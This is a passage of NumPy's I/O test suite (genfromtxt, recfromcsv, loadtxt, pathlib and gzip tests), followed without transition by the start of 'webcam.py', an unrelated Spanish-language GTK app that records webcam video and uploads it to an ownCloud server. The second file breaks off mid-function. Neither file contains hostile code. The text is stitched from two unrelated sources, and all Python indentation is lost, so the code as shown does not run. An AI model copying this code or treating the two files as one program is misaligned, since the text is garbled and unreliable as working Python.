# Test single dtype w/o names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
# Test single dtype w explicit names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
# Test single dtype w implicit names
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
# Test easy structured dtype
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
# Test autostrip
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.genfromtxt(TextIO(data), **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.genfromtxt(TextIO(data), autostrip=True, **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
# Test the 'replace_space' option
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_replace_space_known_dtype(self):
# Test the 'replace_space' (and related) options when dtype != None
txt = "A.A, B (B), C:C\n1, 2, 3"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
# Test w/ incomplete names
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
# Make sure that names are properly completed
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
# Make sure we pick up the right names w/ usecols
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
# Test fix-width w/ names
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
# Test missing values
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b'testNonetherestofthedata')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b' testNonetherestofthedata')
def test_latin1(self):
latin1 = b'\xf6\xfc\xf6'
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + latin1 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1, 0], b"test1")
assert_equal(test[1, 1], b"testNonethe" + latin1)
assert_equal(test[1, 2], b"test3")
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',',
encoding='latin1')
assert_equal(test[1, 0], u"test1")
assert_equal(test[1, 1], u"testNonethe" + latin1.decode('latin1'))
assert_equal(test[1, 2], u"test3")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(b"0,testNonethe" + latin1),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test['f0'], 0)
assert_equal(test['f1'], b"testNonethe" + latin1)
def test_binary_decode_autodtype(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=None, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_utf8_byte_encoding(self):
utf8 = b"\xcf\x96"
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + utf8 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
[b'norm1', b'norm2', b'norm3'],
[b'test1', b'testNonethe' + utf8, b'test3'],
[b'norm1', b'norm2', b'norm3']])
assert_array_equal(test, ctl)
def test_utf8_file(self):
utf8 = b"\xcf\x96"
with temppath() as path:
with open(path, "wb") as f:
f.write((b"test1,testNonethe" + utf8 + b",test3\n") * 2)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
ctl = np.array([
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"],
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"]],
dtype=np.unicode_)
assert_array_equal(test, ctl)
# test a mixed dtype
with open(path, "wb") as f:
f.write(b"0,testNonethe" + utf8)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
assert_equal(test['f0'], 0)
assert_equal(test['f1'], "testNonethe" + utf8.decode("UTF-8"))
def test_utf8_file_nodtype_unicode(self):
# bytes encoding with non-latin1 -> unicode upcast
utf8 = u'\u03d6'
latin1 = u'\xf6\xfc\xf6'
# skip test if cannot encode utf8 test string with preferred
# encoding. The preferred encoding is assumed to be the default
# encoding of io.open. Will need to change this for PyTest, maybe
# using pytest.mark.xfail(raises=***).
try:
encoding = locale.getpreferredencoding()
utf8.encode(encoding)
except (UnicodeError, ImportError):
pytest.skip('Skipping test_utf8_file_nodtype_unicode, '
'unable to encode utf8 in preferred encoding')
with temppath() as path:
with io.open(path, "wt") as f:
f.write(u"norm1,norm2,norm3\n")
f.write(u"norm1," + latin1 + u",norm3\n")
f.write(u"test1,testNonethe" + utf8 + u",test3\n")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '',
np.VisibleDeprecationWarning)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',')
# Check for warning when encoding not specified.
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
["norm1", "norm2", "norm3"],
["norm1", latin1, "norm3"],
["test1", "testNonethe" + utf8, "test3"]],
dtype=np.unicode_)
assert_array_equal(test, ctl)
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', int), ('b', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,3')
dtype = [('a', int), ('b', float)]
test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
control = np.array([(0, 1), (2, 3)],
dtype=dtype)
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#gh-10394
data = TextIO('color\n"red"\n"blue"')
test = np.recfromcsv(data, converters={0: lambda x: x.strip(b'\"')})
control = np.array([('red',), ('blue',)], dtype=[('color', (bytes, 4))])
assert_equal(test.dtype, control.dtype)
assert_equal(test, control)
def test_max_rows(self):
# Test the `max_rows` keyword argument.
data = '1 2\n3 4\n5 6\n7 8\n9 10\n'
txt = TextIO(data)
a1 = np.genfromtxt(txt, max_rows=3)
a2 = np.genfromtxt(txt)
assert_equal(a1, [[1, 2], [3, 4], [5, 6]])
assert_equal(a2, [[7, 8], [9, 10]])
# max_rows must be at least 1.
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=0)
# An input with several invalid rows.
data = '1 1\n2 2\n0 \n3 3\n4 4\n5 \n6 \n7 \n'
test = np.genfromtxt(TextIO(data), max_rows=2)
control = np.array([[1., 1.], [2., 2.]])
assert_equal(test, control)
# Test keywords conflict
assert_raises(ValueError, np.genfromtxt, TextIO(data), skip_footer=1,
max_rows=4)
# Test with invalid value
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=4)
# Test with invalid not raise
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
test = np.genfromtxt(TextIO(data), max_rows=4, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
test = np.genfromtxt(TextIO(data), max_rows=5, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
# Structured array with field names.
data = 'a b\n#c d\n1 1\n2 2\n#0 \n3 3\n4 4\n5 5\n'
# Test with header, names and comments
txt = TextIO(data)
test = np.genfromtxt(txt, skip_header=1, max_rows=3, names=True)
control = np.array([(1.0, 1.0), (2.0, 2.0), (3.0, 3.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
# To continue reading the same "file", don't use skip_header or
# names, and use the previously determined dtype.
test = np.genfromtxt(txt, max_rows=None, dtype=test.dtype)
control = np.array([(4.0, 4.0), (5.0, 5.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file
# object
tgt = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
with temppath() as name:
with open(name, 'w') as f:
f.write(data)
res = np.genfromtxt(name)
assert_array_equal(res, tgt)
def test_gft_from_gzip(self):
# Test that we can load data from a gzipped file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
s = BytesIO()
with gzip.GzipFile(fileobj=s, mode='w') as g:
g.write(asbytes(data))
with temppath(suffix='.gz2') as name:
with open(name, 'w') as f:
f.write(data)
assert_array_equal(np.genfromtxt(name), wanted)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_auto_dtype_largeint(self):
# Regression test for numpy/numpy#5635 whereby large integers could
# cause OverflowErrors.
# Test the automatic definition of the output dtype
#
# 2**66 = 73786976294838206464 => should convert to float
# 2**34 = 17179869184 => should convert to int64
# 2**10 = 1024 => should convert to int (int32 on 32-bit systems,
# int64 on 64-bit systems)
data = TextIO('73786976294838206464 17179869184 1024')
test = np.genfromtxt(data, dtype=None)
assert_equal(test.dtype.names, ['f0', 'f1', 'f2'])
assert_(test.dtype['f0'] == float)
assert_(test.dtype['f1'] == np.int64)
assert_(test.dtype['f2'] == np.integer)
assert_allclose(test['f0'], 73786976294838206464.)
assert_equal(test['f1'], 17179869184)
assert_equal(test['f2'], 1024)
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
class TestPathUsage(object):
# Test that pathlib.Path can be used
def test_loadtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([[1.1, 2], [3, 4]])
np.savetxt(path, a)
x = np.loadtxt(path)
assert_array_equal(x, a)
def test_save_load(self):
# Test that pathlib.Path instances can be used with save.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path)
assert_array_equal(data, a)
def test_save_load_memmap(self):
# Test that pathlib.Path instances can be loaded mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path, mmap_mode='r')
assert_array_equal(data, a)
# close the mem-mapped file
del data
def test_save_load_memmap_readwrite(self):
# Test that pathlib.Path instances can be written mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
b = np.load(path, mmap_mode='r+')
a[0][0] = 5
b[0][0] = 5
del b # closes the file
data = np.load(path)
assert_array_equal(data, a)
def test_savez_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez(path, lab='place holder')
with np.load(path) as data:
assert_array_equal(data['lab'], 'place holder')
def test_savez_compressed_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez_compressed(path, lab='place holder')
data = np.load(path)
assert_array_equal(data['lab'], 'place holder')
data.close()
def test_genfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([(1, 2), (3, 4)])
np.savetxt(path, a)
data = np.genfromtxt(path)
assert_array_equal(a, data)
def test_ndfromtxt(self):
# Test outputting a standard ndarray
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.genfromtxt(path, dtype=int)
assert_array_equal(test, control)
def test_mafromtxt(self):
# From `test_fancy_dtype_alt` above
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'1,2,3.0\n4,5,6.0\n')
test = np.genfromtxt(path, delimiter=',', usemask=True)
control = ma.array([(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)])
assert_equal(test, control)
def test_recfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(path, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_recfromcsv(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(path, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
# These next two classes encode the minimal API needed to save()/load() arrays.
# The `test_ducktyping` ensures they work correctly
class JustWriter(object):
def __init__(self, base):
self.base = base
def write(self, s):
return self.base.write(s)
def flush(self):
return self.base.flush()
class JustReader(object):
def __init__(self, base):
self.base = base
def read(self, n):
return self.base.read(n)
def seek(self, off, whence=0):
return self.base.seek(off, whence)
def test_ducktyping():
a = np.random.random((5, 5))
s = BytesIO()
f = JustWriter(s)
np.save(f, a)
f.flush()
s.seek(0)
f = JustReader(s)
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokenness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
with temppath(suffix='.gz') as name:
with open(name, 'wb') as f:
f.write(s.read())
res = np.loadtxt(name)
s.close()
assert_array_equal(res, [1, 2, 3])
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
@pytest.mark.skipif(not HAS_REFCOUNT, reason="Python lacks refcounts")
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
with assert_no_gc_cycles():
np.load(f)
f.seek(0)
dt = [("a", 'u1', 2), ("b", 'u1', 2)]
with assert_no_gc_cycles():
x = np.loadtxt(TextIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
|
webcam.py | #!/usr/bin/python3
#
# Copyright (C) 2020 P.L. Lucas
#
#
# LICENSE: BSD
# You may use this file under the terms of the BSD license as follows:
#
# "Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of developers or companies in the above copyright, Digia Plc and its
# Subsidiary(-ies) nor the names of its contributors may be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
# Requiere la biblioteca:
# https://github.com/owncloud/pyocclient
#import shlex, subprocess
import socket
import os, sys
import datetime
import os.path
import threading
import time
import owncloud
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import GLib, Gtk, GObject
class Handler:
def __init__(self, builder):
self.builder = builder
self.rotacion = "none"
self.espejo = "none"
self.camara = None
self.grabacion = None
self.alto_pantalla = '600'
self.ancho_pantalla = '800'
self.archivo_actual = None
self.load_settings()
self.hilos = []
self.mostrar_mensaje_fin_subida = False
self.credenciales_modificadas = True
self.sock = None
def load_settings(self):
config = os.path.expanduser('~/.config/viticulosa.txt')
if os.path.exists(config):
fin = open(config)
for linea in fin:
campos = linea.split('=')
if len(campos) > 1:
if campos[0] == 'rotacion':
self.rotacion = campos[1].strip()
elif campos[0] == 'espejo':
self.espejo = campos[1].strip()
elif campos[0] == 'servidor':
self.builder.get_object("servidor").set_text(campos[1].strip())
elif campos[0] == 'login':
self.builder.get_object("login").set_text(campos[1].strip())
elif campos[0] == 'curso':
self.builder.get_object("curso").set_text(campos[1].strip())
fin.close()
camara_rotacion = self.builder.get_object('camara_rotacion')
if self.rotacion == 'none':
camara_rotacion.set_active(0)
elif self.rotacion == 'clockwise':
camara_rotacion.set_active(1)
elif self.rotacion == 'rotate-180':
camara_rotacion.set_active(2)
elif self.rotacion == 'counterclockwise':
camara_rotacion.set_active(3)
espejo = self.builder.get_object('espejo')
if self.espejo == 'none':
espejo.set_active(0)
elif self.espejo == 'horizontal-flip':
espejo.set_active(1)
elif self.espejo == 'vertical-flip':
espejo.set_active(2)
def save_settings(self):
camara_rotacion = self.builder.get_object('camara_rotacion')
valor = camara_rotacion.get_active()
camara = 'none'
if valor == 0:
camara = "none"
elif valor == 1:
camara = "clockwise"
elif valor == 2:
camara = "rotate-180"
elif valor == 3:
camara = "counterclockwise"
espejo_obj = self.builder.get_object('espejo')
valor = espejo_obj.get_active()
espejo = 'none'
if valor == 0:
espejo = "none"
elif valor == 1:
espejo = "horizontal-flip"
elif valor == 2:
espejo = "vertical-flip"
servidor = self.builder.get_object("servidor").get_text()
login = self.builder.get_object("login").get_text()
curso = self.builder.get_object("curso").get_text()
config = os.path.expanduser('~/.config/viticulosa.txt')
if not os.path.exists(config):
path = os.path.expanduser('~/.config')
if not os.path.exists(path):
os.makedirs(path)
fout = open(config, 'w')
fout.write('rotacion={0}\n'.format(camara))
fout.write('espejo={0}\n'.format(espejo))
fout.write('servidor={0}\n'.format(servidor))
fout.write('login={0}\n'.format(login))
fout.write('curso={0}\n'.format(curso))
fout.close()
def onDestroy(self, *args):
if self.grabacion != None:
#self.grabacion.terminate()
#self.grabacion.wait()
self.send_message(b'stop ffmpeg:')
self.grabacion = None
if self.builder.get_object("subir_videos").get_active():
# Se sube el archivo a la nube
print("Subiendo al servidor...")
thread = threading.Thread(target=self.subir_al_servidor)
thread.daemon = True
thread.start()
self.hilos.append(thread)
if self.camara != None:
#self.camara.terminate()
self.send_message(b'stop camara:')
self.save_settings()
for thread in self.hilos:
if thread.is_alive():
self.mostrar_mensaje_fin_subida = True
dialog = Gtk.MessageDialog(
transient_for=self.builder.get_object("window"),
flags=0,
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.CANCEL,
text="ERROR: Hay un proceso de carga al servidor en marcha",
)
dialog.format_secondary_text(
"Todavía hay un vídeo que se está transfiriendo al servidor de EducaMadrid. Si está guardando los vídeos en un dispositivo extraible, por favor, no lo desconecte todavía"
)
dialog.run()
dialog.destroy()
return
Gtk.main_quit()
self.send_message(b'quit:')
def onMensajeFinSubida(self):
hilos_vivos = False
for thread in self.hilos:
if thread.is_alive():
hilos_vivos = True
break
if not hilos_vivos:
dialog = Gtk.MessageDialog(
transient_for=self.builder.get_object("window"),
flags=0,
message_type=Gtk.MessageType.INFO,
buttons=Gtk.ButtonsType.CANCEL,
text="Han finalizado los procesos de subida",
)
dialog.format_secondary_text(
"Los vídeos han sido trasferidos al servidor, puede desconectar los dispositivos extraibles en el caso de que esté guardando ahí sus vídeos"
)
dialog.run()
dialog.destroy()
Gtk.main_quit()
def onRotacion(self, combo):
valor = combo.get_active()
if valor == 0:
self.rotacion = "none"
elif valor == 1:
self.rotacion = "clockwise"
elif valor == 2:
self.rotacion = "rotate-180"
elif valor == 3:
self.rotacion = "counterclockwise"
self.save_settings()
def onEspejo(self, combo):
valor = combo.get_active()
if valor == 0:
self.espejo = "none"
elif valor == 1:
self.espejo = "horizontal-flip"
elif valor == 2:
self.espejo = "vertical-flip"
self.save_settings()
def onSubirVideos(self, ok):
ok = self.builder.get_object("subir_videos").get_active()
self.builder.get_object("servidor").set_sensitive(ok)
self.builder.get_object("login").set_sensitive(ok)
self.builder.get_object("password").set_sensitive(ok)
self.builder.get_object("curso").set_sensitive(ok)
def onCredenciales(self, entry):
self.credenciales_modificadas = True
def onGrabarParar(self, button):
if self.grabacion != None:
#self.grabacion.terminate()
#self.grabacion.wait()
self.send_message(b'stop ffmpeg:')
#time.sleep(10)
self.builder.get_object("grabar").set_label('Grabar')
self.grabacion = None
if self.builder.get_object("subir_videos").get_active():
# Se sube el archivo a la nube
print("Subiendo al servidor...")
thread = threading.Thread(target=self.subir_al_servidor)
thread.daemon = True
thread.start()
self.hilos.append(thread)
return
if self.credenciales_modificadas and self.builder.get_object("subir_videos").get_active():
dialog = Gtk.MessageDialog(
transient_for=self.builder.get_object("window"),
flags=0,
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.CANCEL,
text="ERROR: Debe comprobar las credenciales",
)
dialog.format_secondary_text(
"Debe verificar que las credenciales son correctas. Pulse el boton de comprobar credenciales."
)
dialog.run()
dialog.destroy()
return
fileselect = builder.get_object("directorio_salida")
carpeta = fileselect.get_uri()
if carpeta == None:
dialog = Gtk.MessageDialog(
transient_for=self.builder.get_object("window"),
flags=0,
